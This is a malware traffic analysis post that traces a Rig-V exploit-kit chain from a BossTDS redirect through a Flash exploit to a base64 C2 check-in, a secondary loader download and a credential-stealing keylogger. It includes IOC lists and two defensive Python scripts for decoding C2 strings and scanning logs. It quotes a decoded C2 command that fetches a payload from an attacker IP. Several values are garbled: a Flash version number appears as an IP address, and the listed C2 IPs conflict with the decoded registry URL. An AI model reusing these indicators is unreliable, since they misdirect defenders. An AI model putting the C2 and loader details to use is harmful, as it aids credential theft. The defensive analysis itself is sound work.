- GET /in/traf/ – 302 redirect via port 18001 (BossTDS port)
- GET /boom/mix.php – 302 redirect via port 18001 (BossTDS port)
- 18.104.22.168 – try.uludan.com – Rig-V EK (landing page, Flash exploit, and payload)
- 22.214.171.124 – POST /faa38820fa/dd6c45917a/d23d3e97c0/chat.php – Base64 encoded data being POSTed back
- 126.96.36.199 – GET /~mysuperp/crypt2_7038.exe – Additional malware downloaded
- 188.8.131.52 – POST /log/index.php – Keylogger POSTing keystrokes (Win.Trojan.Amasages variant outbound connection)
- Post-infection DNS queries:
  - envioenvio.fromru.su (ET DNS Query for .su TLD (Soviet Union) Often Malware Related)
  - polikko.eu (ET TROJAN Possible Kelihos .eu CnC Domain Generation Algorithm (DGA) Lookup NXDOMAIN Response)
- SHA256: df8313906607332c81adeaf2e6671de7e28fd71513e41425faaba89bb23b9a35
  File name: try.uludan.com.html (Rig-V EK landing page)
- SHA256: a51c4a6e8797b75620efb64edf297bd2137230a45c18d96f66a3e9edbe988403
  File name: try.uludan.com Flash Exploit.swf
- SHA256: 80c719062d50c19c9ccb0cdba52ef20ee53cf26034364e86a51399214d4fba4b
  File name: radE5200.tmp.exe (Hybrid-Analysis link)
- SHA256: 60ad1ac5cbfaa8bca62a66a4857fb2c9c5094d6272844774b6e305d58a271095
  File name: winsvc.exe (Hybrid-Analysis link)
Picture of Site:
This site doesn’t appear to be one that anyone would visit directly. To me it looks like a domain that users are redirected to.
For example, I originally discovered this site in my customer’s network traffic after they visited sites used to watch live-streamed sporting events.
Unfortunately, this customer doesn’t give me packets (sad face), so I can’t confirm the referer for this incident (although sports streaming sites are full of unwanted redirections). I also tried to recreate the traffic but was unsuccessful.
Finally, I thought, why not try going directly to the domain? I was immediately redirected to a TDS server via an iframe:
The destination port used for the redirection is TCP port 18001, which is used by BossTDS. A TDS, short for Traffic Distribution System, has been used by cybercriminals before as a means to distribute malware. Click HERE to read more about how TDSs have been used to distribute malware.
Here is the TCP stream showing the requested resource at the TDS server returning a 302 Found:
The host was then redirected to /boom/mix[.]php and the server returned another 302:
As you can see, the second 302 Found points directly to a Rig-V Exploit Kit landing page.
Here is a little bit of the obfuscated code that was found on the landing page:
Here is the landing page partially deobfuscated (Thanks to my coworker “elf” for doing the deobfuscation):
You can see the URL for the Flash exploit on the landing page and the URL for the payload.
After the host was redirected to the landing page we can see the Flash exploit being requested and sent back to the host:
This Flash exploit targets CVE-2015-8651 (Flash up to 184.108.40.206/235). Following the Flash exploit, we see two identical requests for the payload, which was dropped in %TEMP%:
The file is also created in AppData\Roaming\YFFjZF9i\sirhcqngr.exe, which is showing as a running process under the description “Graph Microsoft”:
We can also see that it created the following registry key under HKEY_CURRENT_USER\Software\YFFjZF9i:
The value for “a” is “aHR0cDovLzExMS4yMjEuNDcuMTYyL2ZhYTM4ODIwZmEvZGQ2YzQ1OTE3YS9kMjNkM2U5N2MwL2NoYXQucGhw”, which decodes to the following:
This is the URL used to POST base64 encoded data back to the server. Here is the first POST request to 220.127.116.11:
Notice that the first POST contains the variable “_wv”, which is assigned the base64 string “ZW50ZXI”. “ZW50ZXI” decodes to the command “enter”.
The server responds with a 404 error page and its own base64 encoded string “c3VjY2Vzcw”, which decodes to “success”.
Once the infected machine receives the message, the malware responds with the same cookie-auth browser agent (auth=bc00595440e801f8a5d2a2ad13b9791b), along with a reply containing encoded data:
The infected machine is POSTing back base64 encoded data in the following format:
- cmd&<GUID of Machine>&<Logged-in Username: System Name: Domain Name>&<Windows Version and Platform>&<AV product Info>&<Date and Time of Execution>
The response from the server is this chunk of base64 data “MTQ2OTEwMDA5Njg4MjAwMCNib3RraWxsZXIjMTQwMTA3NjM4NjcxNTc2NiNyYXRlIDUj”. This decodes to the following:
- 1469100096882000#botkiller#1401076386715766#rate 5#
We can also see that there is a .vbs file in the user’s Startup folder containing the following command:
After letting the system sit for a while, I found it made a similar POST request as before; however, this time the server responded with encoded data containing a download URL for additional malware:
The base64 contained in the response decodes to:
- 1469100096882000#botkiller#1401076386715766#rate 5#1480369403542508#LOADER hxxp://18.104.22.168/~mysuperp/crypt2_7038.exe
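The check-in, acknowledgement and task strings above are all plain base64 sent without `=` padding, which is why an off-the-shelf decoder chokes on “ZW50ZXI”. The following is an added example (my own code, not part of the original post or the malware) that decodes the strings quoted in this write-up and parses the “&”-delimited check-in and the “#”-delimited task list; treating the task list as (id, command) pairs and pulling the `LOADER` argument out as a download IoC is my reading of the two responses shown, not documented malware behaviour.

```python
import base64
import re
from typing import Dict, List

# Sample inputs: the base64 strings quoted in the write-up above, copied here
# as test data. Nothing is fetched or executed; this only decodes captured text.
REGISTRY_VALUE_A = (
    "aHR0cDovLzExMS4yMjEuNDcuMTYyL2ZhYTM4ODIwZmEvZGQ2YzQ1OTE3YS9kMjNkM2U5N2MwL2NoYXQucGhw"
)
CHECKIN_COMMAND = "ZW50ZXI"       # value of the "_wv" variable in the first POST
SERVER_ACK = "c3VjY2Vzcw"         # body of the server's 404 reply
TASK_RESPONSE = "MTQ2OTEwMDA5Njg4MjAwMCNib3RraWxsZXIjMTQwMTA3NjM4NjcxNTc2NiNyYXRlIDUj"


def b64decode_lenient(text: str) -> str:
    """Decode base64 that the malware sends without '=' padding.

    base64.b64decode() rejects unpadded input ("ZW50ZXI" is 7 characters), so
    pad to a multiple of 4 first. Whitespace is stripped because POST bodies
    copied out of a packet viewer are often line-wrapped.
    """
    cleaned = re.sub(r"\s+", "", text)
    cleaned += "=" * (-len(cleaned) % 4)
    return base64.b64decode(cleaned).decode("utf-8", errors="replace")


def parse_checkin(decoded: str) -> Dict[str, str]:
    """Split the '&'-delimited check-in body into its documented fields.

    Field order follows the format listed in the post: cmd, machine GUID,
    user/system/domain, OS version, AV product, execution timestamp.
    """
    names = ["cmd", "guid", "user_system_domain", "os", "av", "executed_at"]
    return dict(zip(names, decoded.split("&")))


def parse_tasks(decoded: str) -> List[Dict[str, str]]:
    """Parse the '#'-delimited task list the server returns.

    Assumption (mine): the fields alternate id, command, id, command, ... so
    "1469100096882000#botkiller#1401076386715766#rate 5#" is two tasks, and the
    later response appends a third whose command is "LOADER <url>". The LOADER
    argument is surfaced separately because it is the download IoC a defender
    wants to block.
    """
    fields = [f for f in decoded.split("#") if f != ""]
    tasks = []
    for i in range(0, len(fields) - 1, 2):
        task = {"id": fields[i], "command": fields[i + 1]}
        if task["command"].startswith("LOADER "):
            task["url"] = task["command"][len("LOADER "):]
        tasks.append(task)
    return tasks


def loader_urls(b64_response: str) -> List[str]:
    """Decode a captured server response and return any LOADER download URLs."""
    return [t["url"] for t in parse_tasks(b64decode_lenient(b64_response)) if "url" in t]


if __name__ == "__main__":
    print("registry value a ->", b64decode_lenient(REGISTRY_VALUE_A))
    print("_wv ->", b64decode_lenient(CHECKIN_COMMAND))
    print("server ack ->", b64decode_lenient(SERVER_ACK))
    for task in parse_tasks(b64decode_lenient(TASK_RESPONSE)):
        print("task", task)
```

Running the block prints the decoded registry value (the chat.php C2 URL from the IOC list), the “enter”/“success” exchange, and the two tasks carried by the first response. Feeding a later response through `loader_urls()` gives you the secondary-payload URL directly, which is the value worth adding to a proxy block list.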
We then see the host make a GET request for the additional malware (crypt2_7038.exe):
There is an additional file (NN6B09.tmp) created in %TEMP% and the file “winsvc.exe” dropped in Startup:
Following the execution of winsvc.exe we see a POST request to 22.214.171.124 – POST /log/index.php, which contains encoded data (partial image of the POST request):
However, taking a closer look at the POSTed data, we can see that it is a screenshot of my desktop, tagged with my username (Home) and MAC address (blacked out). Using http://www.url-encode-decode.com/ to decode the data, we can see the image being sent over the wire:
ET alerted on this traffic as a keylogger POSTing keystrokes (Win.Trojan.Amasages variant outbound connection). This is accurate: going to Chase.com and entering fake credentials shows that they were POSTed back to the server (along with typos), together with a record of what browser I’m using, the time of the traffic, the folders and programs I have open, and the websites that are open:
As always, I recommend blocking the IPs and domains listed in the IOCs section.
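Beyond blocking, the chain described here has a couple of traits that are easy to hunt for in proxy and DNS logs: a 302 served from TCP port 18001 (the BossTDS listener), requests to the EK/C2 hosts and paths from the IOC list, and post-infection lookups for a .su domain. The script below is an added example (my own code, not from the original post); it runs those checks over constructed log lines in a minimal “host port method path status” proxy layout and a “client qname rcode” DNS layout, neither of which is a real product’s format.

```python
from typing import Callable, List, Optional, Tuple

# IoCs transcribed from the list at the top of this write-up.
IOC_DOMAINS = {"try.uludan.com", "envioenvio.fromru.su", "polikko.eu"}
IOC_PATHS = {"/in/traf/", "/boom/mix.php", "/log/index.php", "/~mysuperp/crypt2_7038.exe"}
IOC_PATH_PREFIXES = ("/faa38820fa/",)   # the chat.php C2 path lives under this directory
TDS_PORT = 18001                          # BossTDS listener port noted in the post

# Constructed sample logs (not real captures). Hosts use documentation ranges.
SAMPLE_PROXY_LOG = """\
203.0.113.5 80 GET /index.html 200
203.0.113.5 18001 GET /in/traf/ 302
203.0.113.5 18001 GET /boom/mix.php 302
try.uludan.com 80 GET /?q=abc 200
203.0.113.6 80 POST /faa38820fa/dd6c45917a/d23d3e97c0/chat.php 404
203.0.113.7 80 POST /log/index.php 200
203.0.113.8 443 GET /updates/manifest.json 200
"""

SAMPLE_DNS_LOG = """\
10.0.0.15 www.example.com. NOERROR
10.0.0.15 envioenvio.fromru.su. NXDOMAIN
10.0.0.15 polikko.eu. NXDOMAIN
10.0.0.15 cdn.some-other.su. NOERROR
10.0.0.15 updates.example.org. NOERROR
"""


def check_proxy_line(line: str) -> Optional[str]:
    """Return a reason string if a proxy log line matches the EK/C2 chain, else None."""
    parts = line.split()
    if len(parts) != 5:
        return None
    host, port, _method, path, status = parts
    if host.lower() in IOC_DOMAINS:
        return f"known EK/C2 host {host}"
    # A 302 coming back from the BossTDS port is the redirect hop seen in the PCAP.
    if port == str(TDS_PORT) and status == "302":
        return f"302 redirect from TDS port {TDS_PORT} ({path})"
    if path in IOC_PATHS or path.startswith(IOC_PATH_PREFIXES):
        return f"known malicious path {path}"
    return None


def check_dns_line(line: str) -> Optional[str]:
    """Return a reason string if a DNS log line matches a known or .su domain, else None."""
    parts = line.split()
    if len(parts) != 3:
        return None
    _client, qname, _rcode = parts
    qname = qname.rstrip(".").lower()
    if qname in IOC_DOMAINS:
        return f"query for known domain {qname}"
    # Mirrors the ET ".su TLD" signature: rare in most environments, so worth a look.
    if qname.endswith(".su"):
        return f"query for .su TLD ({qname})"
    return None


def scan(log: str, checker: Callable[[str], Optional[str]]) -> List[Tuple[str, str]]:
    """Run a checker over every line and collect (line, reason) pairs for hits."""
    hits = []
    for line in log.splitlines():
        reason = checker(line)
        if reason:
            hits.append((line, reason))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_PROXY_LOG, check_proxy_line) + scan(SAMPLE_DNS_LOG, check_dns_line):
        print(f"{hit[1]:45s} <- {hit[0]}")
```

The port-18001 check and the domain list are the high-confidence signals here; a bare path such as /log/index.php is generic enough that in production you would want it paired with the destination host or with the size of the POST body before alerting on it.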
- Shout-out to Twitter user @luutala for giving me the following reference, which helped in augmenting my investigation:
On December 13th, 2016, @sysopfb informed me that, judging by the name from the panel source, the keylogger is calling itself XKeyScore.
Panel login for “XKeyScore”:
XKEYSCORE (abbreviated as XKS) is also the name of a formerly secret computer system first used by the United States National Security Agency for searching and analyzing global Internet data.